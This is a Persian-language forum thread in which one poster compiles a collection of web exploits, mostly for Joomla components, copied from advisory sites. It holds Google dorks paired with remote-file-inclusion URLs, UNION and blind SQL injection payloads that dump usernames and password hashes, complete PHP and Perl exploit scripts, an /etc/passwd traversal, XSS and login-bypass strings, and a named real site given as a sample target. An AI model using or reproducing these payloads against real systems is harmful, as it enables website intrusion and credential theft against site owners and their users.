_.-بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )-._

spyman · بهمن 90

سلام خدمت همه دوستان

هک از طریق injection و شل استفاده میشه

این تاپیک رو فقط به باگهای جوملا اختصاص دادیم که همگی شما با تمامی هک از این شکل ها و بستن آنها در سایت خود و مشکلات جومیلا آشنا شوید:

در این تاپیک باگهای گوناگونی که در CMS ها مختلف کشف میشه و در سایت های امنیتی گزارش داده می شه قرار می گیرد.

تا هم یه بانک اطلاعاتی خوب به روز و کاربردی برای بچه های joomlaforum.ir باشه و هم سریع در دسترس قرار بگیره!

اطلاعیه

خوب تا صفحه 5 داشته باشین تا تشکر شده من به 135 برسه . تازه 30% از باگارو گزاشتم . اگه تشکرم برسه بقیش میزارم

قوانین تاپیک :

1- جواب پیشنهاد و انتقاد شما در تایپیک _.-*سوالات هک و امنیت*-._ قرار داده شود .

2- آموزش هک به تایپیک _.-* آموزش قدم به قدم هک *-._ بروید .

4- برای این که جولوی هک شدن بگیری برین این جا_.-* دیوار آتش با برای جوملا *-._

5 -_.-*نفوذ به سیستم مدیریت محتوای Joomla به همراه مثال*-._

7 - در صورتی که با پستی موافق هستید فقط دگمه تشکر رو بزنید تا مدیریت هم از امار موافق اون مورد اطلاع پیدا کنه.

8 - تمرینات تو گروه هک انجام میدم و کسای که میخوان بیان پیام خصوصی بدن .

ویرایش شده در بهمن 90 توسط spyman

spyman · بهمن 90

اینم سری اول

inurl:"com_admin"

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell

inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell

inurl:"com_htmlarea3_xtd-c"

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell

inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell

inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell

inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=

inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell

inurl:"minibb"
components/minibb/index.php?absolute_path=shell

inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell

inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell

inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l

inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell

inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell

inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l

inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell

inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell

inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

/components/com_securityimages/lang.php?mosConfig_absolute_path=shell

inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell

inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell

inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell

inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell

inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell

inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell

inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell

/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell

inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll

inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell

inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell

inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell

inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell

inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell

inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell

inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell

inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell

inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell

inurl:com_mambowiki
components/com_mambowiki/ MamboLogin.php?IP=shell

inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell

inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell

inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell

inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell

inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell

inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell

inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell

inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell

inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

inurl:com_madeira
/components/com_madeira/img.php?url=shell

inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell

inurl:com_bsq_sitestats
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=she

spyman · بهمن 90

اینم دومی

Security Reason LINK

Topic :
The Joomla ACStartSeite component SQL injection vulnerability

Arrow WLB : WLB-2010020103 (About)
Arrow SecurityAlert : None
Arrow Date : 2010-02-19
Arrow Credit : AtT4CKxT3rR0r1ST
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug

Arrow History : [2010-02-19] Started

Arrow Affected software : The Joomla ACStartSeite component

Arrow Text :

Joomla Component com_acstartseite Sql Injection Vulnerability
==============================================================
#######
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : inurl:"com_acstartseite"

#######

===[ Exploit ]===

www.site.com/index.php?option=com_acstartseite&Itemid=null[sql]&lan
g=de

www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+unio
n+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,1
6,17+from+mos_users&lang=de

#######

spyman · بهمن 90

اینم سومی

Core Joomla Community Polls Component 'controller' Parameter Local File Include Vulnerability

Security Focus LINK

Bugtraq ID: 38330
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Feb 19 2010 12:00AM
Updated: Feb 22 2010 04:02PM
Credit: kaMtiEz
Vulnerable: Core Joomla Community Polls 1.5.2
Not Vulnerable: Core Joomla Community Polls 1.5.3

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00

spyman · بهمن 90

4

Amelia CMS remote SQL injection

Security Reason LINK

Arrow Topic :
Amelia CMS remote SQL injection

Arrow WLB : WLB-2010020113 (About)
Arrow SecurityAlert : None
Arrow Date : 2010-02-23
Arrow Credit : Ariko-Security
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug

Arrow History : [2010-02-23] Started

Arrow Affected software : Amelia CMS

Arrow Text :

# Title: [sql injection vulnerability in Amelia CMS]
# Date: [10.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.ameliadesign.eu/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]

============ { Ariko-Security - Advisory #3/2/2010 } =============

SQL injection vulnerability in Amelia CMS

Vendors Description of Software:
#
http://www.ameliadesign.eu/index.php?page=1322&lang=eng&cnt=service
s

Dork:
# N/A

Application Info:
# Name: Amelia CMS
# Versions: ALL

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix:
# N/A

Time Table
# 10/02/2009 - Vendor notified.

Input passed via the "page" parameter to index.php is not
properly

sanitised before being used in a SQL query and it is possible to get

sensitive information using for example Time-Base Blind SQL Injection

attacks.

Solution:
# Input validation of "page" parameter should be corrected.

Vulnerability:
#
http://www.[site]/index.php?page=1322[sqli]&lang=eng&cnt=services

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
Advisory:
#http://www.ariko-security.com/feb2010/ad453.html
# Contacts: support[-at-]ariko-security.com

spyman · بهمن 90

.

Article Friendly <= SQL Injection Vulnerability

Security Reason Link

Arrow Topic :
Article Friendly <= SQL Injection Vulnerability

Arrow WLB : WLB-2010020122 (About)
Arrow SecurityAlert : None
Arrow Date : 2010-02-23
Arrow Credit : SkuLL-HacKeR
Arrow Added by : SecurityReason
Arrow SecurityRisk : Medium Security Risk Medium (About)
Arrow Remote : Yes
Arrow Local : No
Arrow Status : Bug

Arrow History : [2010-02-23] Started

Arrow Affected software : Article Friendly

Arrow Text :

=========
[!] Article Friendly <= SQL Injection Vulnerability
==========

# Author : SkuLL-HacKeR
# Site p4ge : http://www.articlefriendly.com/
# # GreetZ : AmiZya - Stack - djekmani4ever
# Dork : Powered by Article DashBoard #
# Sh0w CreW : Jiko HxH - THE SAD HACKER
# My Home: www.no-exploit.com & # wWw.Owned-m.CoM
# T3st3d on: MacBook & Windows XP SP3

##############

===[ #-/Expl0it Code\-# : ]===

# SQL Injection Vulnerability :

#-/ Link Admin: www.Target.com/[scriptarticleLoser]/admin/

#-/ 0r :
www.Target.com[script-article-Loser]/admin/index.php?filename=adminlogin

#-/Username : admin' or 'a'='a

#-/Password : adminKas0l

##############

http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin

spyman · بهمن 90

Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability

Link

view source print? #!/usr/bin/php <?php ini_set("max_execution_time",0); print_r(' ########################################################################### [»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability ########################################################################### [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie [»] Dork: inurl:index.php?option=com_joomlaconnect_be ########################################################################### ########################################################################### # # Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit # [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 # # ########################################################################### '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>

spyman · بهمن 90

 	 		 			 Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password: /admin/admin.php?action=edit_member&value=1

link

یه نمونه

http://www.eaa-mauritius.com/phpBaza...member&value=1

در ضمن می تونید دورک های تو سایتهای دیگر هم استفاده کنید.

spyman · بهمن 90

اینم هست یه سری بدون نمونه

# googledork : "Calendar programming by AppIdeas.com" filetype:php
http://[sERVER]/[PATH]/week.php?LoName=<script>alert(67)</script>

http://[sERVER]/[PATH]/month.php?LoName=<script>alert(788)</script>

http://[sERVER]/[PATH]/event.php?AddressLink="><script>alert(6767)</script><"

SQL Injections:

http://[sERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[sERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[sERVER]/[PATH]/event.php?ID=(1=1)
 [/left]
[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[sql]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [sql]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [sql]

[/color][color=#0000BB]http[/color][color=#007700]:[/color][color=#FF8000]//[sERVER]/[PATH]/admin/delCategory.php?LocationID=x' [sql] [/color][/color]

spyman · بهمن 90

WebAdministrator Lite CMS SQL Injection Vulnerability

LINK

============ { Ariko-Security - Advisory #5/2/2010 } =============

SQL injection vulnerability in WebAdministrator Lite CMS

Vendor's Description of Software:
# http://jskinternet.pl/portal/jsk/3/Oferta.html

Dork:
# webadministrator lite

Application Info:
# Name: WebAdministrator Lite CMS
# Versions: LITE

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: medium

Fix:
# N/A

Time Table:
# 25/02/2010 - Vendor notified.
# 25/02/2010 - Vendor response "we will not release FIX for LITE, soon

new version"....

Input passed via the "s" parameter to download.php is not properly

sanitised before being used in a SQL query.

Solution:
# Input validation of "s" parameter should be corrected.

Vulnerability:
# http://[site]/download.php?s=[sqli]&id=2324

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com

Ariko-Security
Maciej Gojny
vuln@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)

spyman · بهمن 90

Joomla 1.5.15 Persistant XSS in 'Author Alias

Security Reason

Topic : Joomla 1.5.15 Persistant XSS in 'Author Alias'

WLB : WLB-2010020137 (About)

SecurityAlert : None
Date : 2010-02-26

Credit : coffey
Added by : SecurityReason
SecurityRisk : Low (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-26] Started

Affected software : Joomla 1.5.15

Text :

date -------------[ 24.02.2010
prog -------------[ Joomla 1.5.15
vuln -------------[ Persistant XSS in 'Author Alias'
source -------------[ www.joomla.org
by -------------[ coffey

poc
Persistant XSS in 'Author Alias' when adding new Article (logged only).

/administrator/index.php?option=com_content&sectionid=0&task=edit&a
mp;cid[]=46

$details_created_by_alias="><script>alert(1)</script>

spyman · بهمن 90

PBBoard 2.0.5 add administrator and shell upload vulnerabilities

Security Reason

Topic : PBBoard 2.0.5 add administrator and shell upload vulnerabilities

WLB : WLB-2010020135 (About)

SecurityAlert : None
Date : 2010-02-26

Credit : indoushka
SecurityRisk : High (About)
Remote : Yes
Local : No
Status : Bug

History : [2010-02-26] Started

Affected software : PBBoard 2.0.5

Text :

===========================================================================
=============
| # Title : PBBoard Version 2.0.5 Mullti Vulnerability
| # Author : indoushka

| # email : indoushka@hotmail.com

| # Home : www.iq-ty.com

| # Web Site : http://www.pbboard.com/PBBoard_v2.0.5.zip

| # Dork : Powered by PBBoard© 2009 Version 2.0.5

| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4
Ubuntu)
| # Bug : Mullti

====================== Exploit By indoushka
=================================
# Exploit :

1- Add Admin:

http://127.0.0.1/upload/setup/install/?step=4

2- upload Vulnerability:

Fter register go to

http://127.0.0.1/upload/index.php?page=usercp&control=1&avatar=1&am
p;main=1

After Upload go to 2 find

http://127.0.0.1/Upload/download/avatar/(Ev!l name.php)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix
==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir)
SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z
(www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r
IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me *
www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
---------------------------------------------------------------------------
-----------------------------------

spyman · بهمن 90

Joomla Component com_hdflvplayer SQL injection exploit

#!/usr/bin/perl -w

###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$t
ukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}

spyman · بهمن 90

WSC CMS (Bypass) SQL Injection Vulnerability

Security Reason

Arrow Topic :
WSC CMS (Bypass) SQL Injection Vulnerability

Arrow SecurityAlert : 7045
Arrow CVE : CVE-2010-0698
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : Phenom
Arrow Published : 26.02.2010

Arrow Affected Software : dynamicsoft:wsc_cms:2.2

Arrow Advisory Content :

# Exploit Title: WSC CMS (Bypass) SQL Injection Vulnerability
# Date: 2010-02-19
# Author: Phenom
# Software Link:
# Version:
# Tested on: windows xp sp3
# CVE :
# Code :

------------------------------------------------------
------------------------------------------------------

_____ _
| __ | |
| |__) | |__ ___ _ __ ___ _ __ ___
| ___/| '_ \ / _ \ '_ / _/| '_ ` _ \
| | | | | | __/ | | | (_) | | | | | |
|_| |_| |_|\___|_| |_|\/__/|_| |_| |_|

------------------------------------------------------
------------------------------------------------------

############### WSC CMS (Bypass) SQL Injection Vulnerability
###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMS by Dynamicsoft
#
####### Exploit
#############################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or as password
#
#############################################################

spyman · بهمن 90

Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability

Security Reason

Arrow Topic :
Joomla Component com_perchagallery 1.4 SQL Injection Vulnerability

Arrow SecurityAlert : 7043
Arrow CVE : CVE-2010-0694
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : No
Arrow Credit : FL0RiX
Arrow Published : 26.02.2010

Arrow Affected Software : percha:com_perchagallery:1.4 and previous versions

Arrow Advisory Content :

# Joomla Component com_perchagallery SQL Injection Vulnerability

# Author :FL0RiX

#

# Name : com_perchagallery
#
# Bug Type : SQL Injection

#

# Infection : Admin login bilgileri alinabilir.

#

# Demo Vuln :
#
#
http://www.community.phoenixmbs.com/index.php?option=com_perchagallery&view
=editunidad&id=[EXPLOIT]
#
#EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/*
*/from/**/jos_users--

########################################################################

spyman · بهمن 90

Joomla Component com_yanc SQL Injection Vulnerability

LINK

==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================

[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork: [inurl:index.php?option=com_yanc "listid" ]
###########################################################################
===[ Exploit ]===

[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################

spyman · بهمن 90

Joomla Component com_liveticker Blind SQL Injection Vulnerability

LINK

#!/usr/bin/php
<?php
ini_set("max_execution_time",0);
print_r('
#####################################################################
[»] Joomla com_liveticker Remote Blind Injection Vulnerability
#####################################################################
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com ]
[»] Site: [ sec-war.com/cc>]
[»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie
[»] Dork: [ inurl:index.php?option=com_liveticker "viewticker" ]
######################################################################
######################################################################
# Joomla com_liveticker (tid) Blind SQL Injection Exploit
# [x] Usage: Snakespc.php "http://url/index.php?option=com_liveticker&task=viewticker&tid=1"
######################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>

spyman · بهمن 90

Trixbox 2.2.4 honecDirectory.php SQL Injection

Security Reason

Arrow Topic :
Trixbox 2.2.4 honecDirectory.php SQL Injection

Arrow SecurityAlert : 7053
Arrow CVE : CVE-2010-0702
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : NorSlacker
Arrow Published : 28.02.2010

Arrow Affected Software : fonality:trixbox:2.2.4

Arrow Advisory Content :

# Exploit Title: Trixbox PhonecDirectory.php SQL Injection
# Date: 18.02.2010
# Author: NorSlacker
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://trixbox/cisco/services/PhoneDirectory.php?ID=1 [sql INJECTION]

Example (Grab users / password hashes from sugarcrm)
http://trixbox/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT
id,user_hash AS 'first_name',last_name,phone_home,user_name AS
'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1'
GROUP BY 'id

PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the
dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";

$Query = "SELECT id, first_name, last_name, phone_home, phone_work,
phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);

...

}

#norslacker [at] gmail [dot] com

spyman · بهمن 90

Omnidocs SQL injection Vulnerability

Security Reason

Arrow Topic :
Omnidocs SQL injection Vulnerability

Arrow SecurityAlert : 7051
Arrow CVE : CVE-2010-0701
Arrow CWE : CWE-89
Arrow SecurityRisk : High Security Risk High (About)
Arrow Remote Exploit : Yes
Arrow Local Exploit : No
Arrow Victim interaction required : No
Arrow Exploit Available : Yes
Arrow Credit : thebluegenius
Arrow Published : 28.02.2010

Arrow Affected Software : newgensoft:omnidocs

Arrow Advisory Content :

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA

---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By :Thebluegenius.
Email :rajsm@isac.org.in
Blog :thebluegenius.com.
---------------------------------------------------

Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating,
capturing, managing, delivering and archiving large volumes of documents
and contents. Also integrates seamlessly with other enterprise
applications.

------------------
Vulnerability
------------------

Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp

Command: ' or 'a' = 'a'
Confirmed SQL Injection error : ORA-00907: missing right parenthesis

Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly
terminated

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in

این آخری . اکه مردی دیدم میزارم . تشکر کنین خیلی بهتر . اینجوری من میفهمم که کارم دارم درست انجام میدم

منبع : ashiyane.org

spyman · بهمن 90

vBulletin Version 3.8.4 File Include Vulnerability

Security Reason

 


Arrow  Topic :      
vBulletin Version 3.8.4 File Include Vulnerability 

Arrow  WLB :     WLB-2010030006  (About) 
Arrow  SecurityAlert : None 
Arrow  Date :     2010-03-02 
Arrow  Credit          : EjRaMHaCKeR 
Arrow  Added by     : EjRaMHaCKeR 
Arrow  SecurityRisk : Low  Security Risk Low  (About) 
Arrow  Remote : Yes 
Arrow  Local     : No 
Arrow  Status   : Bogus 

Arrow  History :     [2010-03-02] Started 

Arrow  Affected software :      vBulletin Version 3.8.4 



